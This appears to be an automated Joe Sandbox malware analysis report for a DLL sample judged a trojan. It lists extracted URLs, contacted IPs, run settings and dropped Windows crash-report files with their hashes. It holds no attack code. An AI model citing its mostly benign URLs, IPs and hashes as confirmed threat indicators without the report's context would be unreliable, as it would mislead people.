                                                                                                                                                                            https://policies.oath.com/us/en/oath/privacy/index.htmlauction[1].htm.6.drfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://cdn.cookielaw.org/vendorlist/googleData.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://www.msn.com/de-ch/news/other/betrunkener-kia-fahrer-30-streift-polizeiauto-und-haut-ab/ar-AAde-ch[1].htm.6.drfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://outlook.com/de-ch[1].htm.6.drfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://play.google.com/intl/en_us/badges/images/generic/de_badge_web_generic.png&quot;de-ch[1].htm.6.drfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2~DF8EB834D22FF64704.TMP.4.drfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.jsoniab2Data[1].json.6.drfalse
                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://cdn.cookielaw.org/vendorlist/iabData.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://cdn.cookielaw.org/vendorlist/iab2Data.json55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.drfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            https://onedrive.live.com/?qt=mru;Aktuelle52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              https://cdn.flurry.com/adTemplates/templates/htmls/clips.html&quot;auction[1].htm.6.drfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://www.msn.com/de-ch/?ocid=iehp~DF8EB834D22FF64704.TMP.4.drfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://www.msn.com/de-ch/nachrichten/z%c3%bcrich/die-schulen-sind-am-anschlag-ansteckungen-unter-kide-ch[1].htm.6.drfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://sp.booking.com/index.html?aid=1589774&amp;label=dech-prime-hp-shoppingstripe-navde-ch[1].htm.6.drfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://www.ebay.ch/?mkcid=1&amp;mkrid=5222-53480-19255-0&amp;siteid=193&amp;campid=5338626668&amp;tde-ch[1].htm.6.drfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://ir2.beap.gemini.yahoo.com/mbcsc?bv=1.0.0&amp;es=ofrom5sGIS_KXxy9_JDp4mX9JHjHM.c541SmqMEFZwTHauction[1].htm.6.drfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://web.vortex.data.msn.com/collect/v1/t.gif?name=%27Ms.Webi.PageView%27&amp;ver=%272.1%27&amp;ade-ch[1].htm.6.drfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://www.stroeer.de/konvergenz-konzepte/daten-technologien/stroeer-ssp/datenschutz-ssp.htmliab2Data[1].json.6.drfalse
                                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            https://www.bidstack.com/privacy-policy/iab2Data[1].json.6.drfalse
                                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            https://onedrive.live.com/about/en/download/52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              http://popup.taboola.com/germanauction[1].htm.6.drfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://www.ricardo.ch/?utm_source=msn&amp;utm_medium=affiliate&amp;utm_campaign=msn_mestripe_logo_dde-ch[1].htm.6.drfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://twitter.com/de-ch[1].htm.6.drfalse
                                                                                                                                                                                                                    		high
                                                                                                                                                                                                                    https://outlook.live.com/calendar52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                                                                                      		high
                                                                                                                                                                                                                      https://srtb.msn.com:443/notify/viewedg?rid=8579855945c54b10b74180716ce798ce&amp;r=infopane&amp;i=3&auction[1].htm.6.drfalse
                                                                                                                                                                                                                        		high
                                                                                                                                                                                                                        https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auauction[1].htm.6.drfalse
                                                                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                        https://onedrive.live.com/#qt=mru52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                                                                                          		high
                                                                                                                                                                                                                          https://api.taboola.com/2.0/json/msn-ch-de-home/recommendations.notify-click?app.type=desktop&amp;apauction[1].htm.6.drfalse
                                                                                                                                                                                                                            		high
                                                                                                                                                                                                                            https://www.msn.com?form=MY01O4&OCID=MY01O4de-ch[1].htm.6.drfalse
                                                                                                                                                                                                                              		high
                                                                                                                                                                                                                              https://support.skype.com52-478955-68ddb2ab[1].js.6.drfalse
                                                                                                                                                                                                                                		high
                                                                                                                                                                                                                                https://www.skyscanner.net/flights?associateid=API_B2B_19305_00001&amp;vertical=custom&amp;pageType=de-ch[1].htm.6.drfalse
                                                                                                                                                                                                                                  		high

                                                                                                                                                                                                                                  Contacted IPs

                                                                                                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                                                                                                  • 75% < No. of IPs

                                                                                                                                                                                                                                  Public

                                                                                                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                                  104.26.2.70
                                                                                                                                                                                                                                  		ad-delivery.netUnited States
                                                                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                  13.225.29.191
                                                                                                                                                                                                                                  		ocsp.sca1b.amazontrust.comUnited States
                                                                                                                                                                                                                                  		16509AMAZON-02USfalse
                                                                                                                                                                                                                                  87.248.118.23
                                                                                                                                                                                                                                  		edge.gycpi.b.yahoodns.netUnited Kingdom
                                                                                                                                                                                                                                  		203220YAHOO-DEBDEfalse
                                                                                                                                                                                                                                  172.217.19.102
                                                                                                                                                                                                                                  		dart.l.doubleclick.netUnited States
                                                                                                                                                                                                                                  		15169GOOGLEUSfalse
                                                                                                                                                                                                                                  151.101.1.44
                                                                                                                                                                                                                                  		tls13.taboola.map.fastly.netUnited States
                                                                                                                                                                                                                                  		54113FASTLYUSfalse
                                                                                                                                                                                                                                  104.20.184.68
                                                                                                                                                                                                                                  		geolocation.onetrust.comUnited States
                                                                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                                  172.67.70.134
                                                                                                                                                                                                                                  		btloader.comUnited States
                                                                                                                                                                                                                                  		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                                                                  Private

                                                                                                                                                                                                                                  IP
                                                                                                                                                                                                                                  192.168.2.1

                                                                                                                                                                                                                                  General Information

                                                                                                                                                                                                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                                                                                                                                                                                                  Analysis ID:481107
                                                                                                                                                                                                                                  Start date:10.09.2021
                                                                                                                                                                                                                                  Start time:11:10:34
                                                                                                                                                                                                                                  Joe Sandbox Product:CloudBasic
                                                                                                                                                                                                                                  Overall analysis duration:0h 13m 43s
                                                                                                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                                  Report type:full
                                                                                                                                                                                                                                  Sample file name:qT9Qk5aKTk.dll
                                                                                                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                                                                                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                                                                  Number of analysed new started processes analysed:46
                                                                                                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                                                                                                  Number of injected processes analysed:0
                                                                                                                                                                                                                                  Technologies:
                                                                                                                                                                                                                                  • HCA enabled
                                                                                                                                                                                                                                  • EGA enabled
                                                                                                                                                                                                                                  • HDC enabled
                                                                                                                                                                                                                                  • AMSI enabled
                                                                                                                                                                                                                                  Analysis Mode:default
                                                                                                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                                                                                                  Detection:MAL
                                                                                                                                                                                                                                  Classification:mal92.troj.winDLL@62/162@17/8
                                                                                                                                                                                                                                  EGA Information:
                                                                                                                                                                                                                                  • Successful, ratio: 30%
                                                                                                                                                                                                                                  HDC Information:
                                                                                                                                                                                                                                  • Successful, ratio: 78.1% (good quality ratio 68.9%)
                                                                                                                                                                                                                                  • Quality average: 70.5%
                                                                                                                                                                                                                                  • Quality standard deviation: 35.1%
                                                                                                                                                                                                                                  HCA Information:
                                                                                                                                                                                                                                  • Successful, ratio: 72%
                                                                                                                                                                                                                                  • Number of executed functions: 200
                                                                                                                                                                                                                                  • Number of non-executed functions: 70
                                                                                                                                                                                                                                  Cookbook Comments:
                                                                                                                                                                                                                                  • Adjust boot time
                                                                                                                                                                                                                                  • Enable AMSI
                                                                                                                                                                                                                                  • Found application associated with file extension: .dll
                                                                                                                                                                                                                                  Warnings:
                                                                                                                                                                                                                                  Show All
                                                                                                                                                                                                                                  • Exclude process from analysis (whitelisted): ielowutil.exe, WerFault.exe, backgroundTaskHost.exe, SgrmBroker.exe, WmiPrvSE.exe, svchost.exe, ApplicationFrameHost.exe
                                                                                                                                                                                                                                  • Excluded IPs from analysis (whitelisted): 23.203.80.193, 204.79.197.203, 80.67.82.240, 80.67.82.209, 131.253.33.200, 13.107.22.200, 65.55.44.109, 23.211.6.95, 23.211.4.86, 20.82.210.154, 152.199.19.161, 93.184.221.240, 40.127.240.158, 51.11.168.232, 20.189.173.21, 80.67.82.235, 80.67.82.211, 20.189.173.20, 20.54.110.249, 40.112.88.60
                                                                                                                                                                                                                                  • Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, e11290.dspg.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, hlb.apr-52dd2-0.edgecastdns.net, watson.telemetry.microsoft.com, www.bing.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, cvision.media.net.edgekey.net, ris-prod.trafficmanager.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, settingsfd-geo.trafficmanager.net, dual-a-0001.dc-msedge.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, cs9.wpc.v0cdn.net, onecs-live.ec.azureedge.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, iecvlist.microsoft.com, go.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, cs11.wpc.v0cdn.net, onedsblobprdwus16.westus.cloudapp.azure.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, ie9comview.vo.msecnd.net, wu.ec.azureedge.net, a-0003.a-msedge.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.useroor.bigcatalog.commerce.microsoft.com, onedsblobprdwus15.westus.cloudapp.azure.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, settings-win.data.microsoft.com, www-msn-com.a-0003.a-msedge.net, e607.d.akamaiedge.net, web.vortex.data.microsoft.com, onecs-live.azureedge.net, a-0001.a-afdentry.net.trafficmanager.net, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                                                                                                                                                                  • Execution Graph export aborted for target rundll32.exe, PID 2448 because there are no executed function
                                                                                                                                                                                                                                  • Execution Graph export aborted for target rundll32.exe, PID 2736 because there are no executed function
                                                                                                                                                                                                                                  • Execution Graph export aborted for target rundll32.exe, PID 4196 because there are no executed function
                                                                                                                                                                                                                                  • Execution Graph export aborted for target rundll32.exe, PID 5440 because there are no executed function
                                                                                                                                                                                                                                  • Execution Graph export aborted for target rundll32.exe, PID 5680 because there are no executed function
                                                                                                                                                                                                                                  • Execution Graph export aborted for target rundll32.exe, PID 6296 because there are no executed function
                                                                                                                                                                                                                                  • Execution Graph export aborted for target rundll32.exe, PID 6540 because there are no executed function
                                                                                                                                                                                                                                  • Execution Graph export aborted for target rundll32.exe, PID 6660 because there are no executed function
                                                                                                                                                                                                                                  • Execution Graph export aborted for target rundll32.exe, PID 6668 because there are no executed function
                                                                                                                                                                                                                                  • Execution Graph export aborted for target rundll32.exe, PID 6840 because there are no executed function
                                                                                                                                                                                                                                  • Execution Graph export aborted for target rundll32.exe, PID 7044 because there are no executed function
                                                                                                                                                                                                                                  • Execution Graph export aborted for target rundll32.exe, PID 7160 because there are no executed function
                                                                                                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.

                                                                                                                                                                                                                                  Simulations

                                                                                                                                                                                                                                  Behavior and APIs

                                                                                                                                                                                                                                  TimeTypeDescription
                                                                                                                                                                                                                                  11:11:43API Interceptor2x Sleep call for process: rundll32.exe modified
                                                                                                                                                                                                                                  11:12:49API Interceptor1x Sleep call for process: regsvr32.exe modified
                                                                                                                                                                                                                                  11:12:52API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                                  11:13:03API Interceptor1x Sleep call for process: loaddll32.exe modified

                                                                                                                                                                                                                                  Joe Sandbox View / Context

                                                                                                                                                                                                                                  IPs

                                                                                                                                                                                                                                  No context

                                                                                                                                                                                                                                  Domains

                                                                                                                                                                                                                                  No context

                                                                                                                                                                                                                                  ASN

                                                                                                                                                                                                                                  No context

                                                                                                                                                                                                                                  JA3 Fingerprints

                                                                                                                                                                                                                                  No context

                                                                                                                                                                                                                                  Dropped Files

                                                                                                                                                                                                                                  No context

                                                                                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_4323c1d7a32576d87639b5d887c5a93fe7aab20_82810a17_02ccbfde\Report.wer
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11920
                                                                                                                                                                                                                                  Entropy (8bit):3.756719613121307
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:TYsi+0oXyHygtwjed+5/u7snS274ItWcB:TDiIXKygtwjeU/u7snX4ItWcB
                                                                                                                                                                                                                                  MD5:5A6C504B31B4A14DBAC20A5AE98E6AF9
                                                                                                                                                                                                                                  SHA1:AA16A48947086EB6A7A399AE298ABA7AFF9F4E18
                                                                                                                                                                                                                                  SHA-256:1660E7AE5BBF27684B32A721E5962106F40AAD1B6AFA9584E115B8EB4B8FBFF1
                                                                                                                                                                                                                                  SHA-512:BB47AFC1213ABF6E95E2B4A366A8FA0CAF950503D593D575D9A9D52C84843B7568FBC8F269346FE1BC67A3C7314EFC728448933AD722E29452E1C4E3D4C13FD0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.5.7.7.1.1.5.7.9.3.1.4.3.6.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.5.7.7.1.1.8.6.8.3.0.0.5.2.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.4.1.0.9.5.e.4.-.a.2.7.2.-.4.3.5.2.-.9.7.2.3.-.a.1.a.0.5.1.a.4.c.6.3.e.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.9.3.a.9.1.3.6.-.d.8.a.9.-.4.2.4.5.-.8.5.e.f.-.0.6.e.b.d.c.f.f.6.c.f.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.b.0.-.0.0.0.1.-.0.0.1.7.-.7.5.4.c.-.c.3.5.8.6.f.a.6.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.
                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_4323c1d7a32576d87639b5d887c5a93fe7aab20_82810a17_199c0d18\Report.wer
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):11920
                                                                                                                                                                                                                                  Entropy (8bit):3.7571231064146446
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:BNy4iT0oX2Hygtwjed+x/u7s2S274ItWcW:LPiNXuygtwjec/u7s2X4ItWcW
                                                                                                                                                                                                                                  MD5:B809BAAABB1FAE77151235784611ABE0
                                                                                                                                                                                                                                  SHA1:D31E947B9E0048DEE25534029C8842DC4D680B28
                                                                                                                                                                                                                                  SHA-256:5268D964080D257046D8161D665462026C4456A05F453BFD94508290E35C1ADD
                                                                                                                                                                                                                                  SHA-512:63B6FD8E5B12071E6A4522F517FB7582CBF9A0651770DBD588A6A5B9B72AD51FB7DB8D7CA3D38C26CEB7C419E04B13DAEAF0A2B5ACDB4F9813B2E06F1302E08B
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.5.7.7.1.1.4.7.0.6.4.8.4.4.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.5.7.7.1.1.6.9.6.6.1.3.6.5.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.f.4.1.1.b.c.c.-.4.d.7.3.-.4.2.7.d.-.a.5.2.e.-.6.3.8.5.b.d.e.c.4.6.0.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.a.c.3.4.c.1.c.-.c.b.3.b.-.4.c.0.f.-.9.a.a.a.-.4.c.b.f.1.e.d.b.a.0.c.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.b.8.-.0.0.0.1.-.0.0.1.7.-.7.1.4.7.-.5.e.5.4.6.f.a.6.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.
                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER9FE.tmp.xml
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4630
                                                                                                                                                                                                                                  Entropy (8bit):4.456257015244924
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:cvIwSD8zsDJgtWI9zTWSC8B38fm8M4JCds9FW+q8/5N4SrS1d:uITfdQiSNKJsWDW1d
                                                                                                                                                                                                                                  MD5:C85522AED6D99245B2AD73EB42FDDED7
                                                                                                                                                                                                                                  SHA1:432461EF66EBBA3B9008B1C628BA57E848B4AE18
                                                                                                                                                                                                                                  SHA-256:BB251150EE66BCAB97D2ED5DAB3566A697E98A5CE28EFBD32166758E24EFB440
                                                                                                                                                                                                                                  SHA-512:DD1730550C25953179E8C023B12ACB1F12659FAE6D74B5ABA0F7C038EE74880F059E3726AD9F78839E4ABF73CB14C04E60044A09FDD8117B7D6B5F6F2B3754AA
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1160843" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERA873.tmp.dmp
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  File Type:Mini DuMP crash report, 15 streams, Fri Sep 10 18:12:32 2021, 0x1205a4 type
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):60916
                                                                                                                                                                                                                                  Entropy (8bit):1.9527058025831723
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:0Lon82dJpLXznNRmoJi5nRURxTq0DW4uzPNweQT2PPmwbUMIQrGWI:ln82bhX7N4ochquQW4uzPNMkuwUQCr
                                                                                                                                                                                                                                  MD5:C06DECD89D8016975BB470963B06B70F
                                                                                                                                                                                                                                  SHA1:AD9806DDCCF66375C78FF0CE3C535834FB32109B
                                                                                                                                                                                                                                  SHA-256:D27048068C6143699CEFDBF1558E6C08CBB1A4171E2AD30C2AB2143982CB26E9
                                                                                                                                                                                                                                  SHA-512:F09D5DEED01DA3E6378D872DDF556562848BA4591CAC3F349B629FEE3DC5F3B365A3426C306F16A5831DC2C1032205772F3DBCAED187209F0D4FB69209FDF561
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: MDMP....... .........;a...................U...........B......x.......GenuineIntelW...........T............;a.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERBF86.tmp.WERInternalMetadata.xml
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):8278
                                                                                                                                                                                                                                  Entropy (8bit):3.6917716035104053
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:Rrl7r3GLNin76XJskf6Y/rE6fgmfTkOSnCpDd89bBQsfS6rm:RrlsNi76Jf6Yg6fgmfTkOSdBjfS/
                                                                                                                                                                                                                                  MD5:7DA0AFD856668114EC1F97AA0505932E
                                                                                                                                                                                                                                  SHA1:46490E391458F15B7EFAB35F9F6137B8C9C37390
                                                                                                                                                                                                                                  SHA-256:F27792E5F4F5F7CDB73534F8A4972EAF404EC631BDBC1C2DACDA03A93600A769
                                                                                                                                                                                                                                  SHA-512:F23D14853B8A945D8B85EC32EB08D53DCFD82A93A6A795034901D093F330D70193E5A6369B1CD4DBC82DF5B7C169F4740785FFCCABFB7EEB17BC04A3689A0316
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.8.4.0.<./.P.i.d.>.......
                                                                                                                                                                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERC69C.tmp.xml
                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):4630
                                                                                                                                                                                                                                  Entropy (8bit):4.451509704292732
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:cvIwSD8zsDJgtWI9zTWSC8BV8fm8M4JCds9Fsv+q8/54H4SrSrd:uITfdQiSNwJmvnDWrd
                                                                                                                                                                                                                                  MD5:575C740718B3B29BF8626E2D141E2A66
                                                                                                                                                                                                                                  SHA1:BA21A473D5E2FEB19936506A3654C59BCF14ADE5
                                                                                                                                                                                                                                  SHA-256:23B7BFD1430C86B9009F0483AEEABD141258632E315202F9E9A8461AFFE9F7D1
